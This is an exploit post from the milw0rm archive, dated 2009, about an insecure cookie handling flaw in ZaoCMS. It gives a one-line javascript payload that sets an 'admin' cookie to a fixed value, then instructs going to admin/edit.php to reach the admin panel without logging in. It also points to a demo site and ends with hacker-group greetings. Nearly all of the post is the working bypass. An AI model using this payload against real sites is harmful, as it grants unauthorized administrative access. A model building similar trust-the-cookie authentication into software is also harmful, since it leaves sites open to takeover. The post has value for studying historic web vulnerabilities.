21 lines
No EOL
789 B
Text
21 lines
No EOL
789 B
Text
--------------------------------------------------------------
|
|
ZaoCMS Insecure Cookie Handling Vulnerability
|
|
---------------------------------------------------------------
|
|
Founder :ThE g0bL!N
|
|
Home:http://www.zaocms.com/
|
|
Software : ZaoCMS
|
|
---------------------------------------------------------------
|
|
Exploit:
|
|
---------
|
|
admin/login.php
|
|
javascript:document.cookie="admin=stgAdmin;path=/";
|
|
Then Go To
|
|
admin/edit.php
|
|
demo:
|
|
-------
|
|
http://demo.zaocms.com/admin/login.php
|
|
-----------------------------------------------------------------------------------------------------
|
|
His0k4 - Dr-HTmL , Dos-Dz TeaM , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.
|
|
-----------------------------------------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2009-05-21] |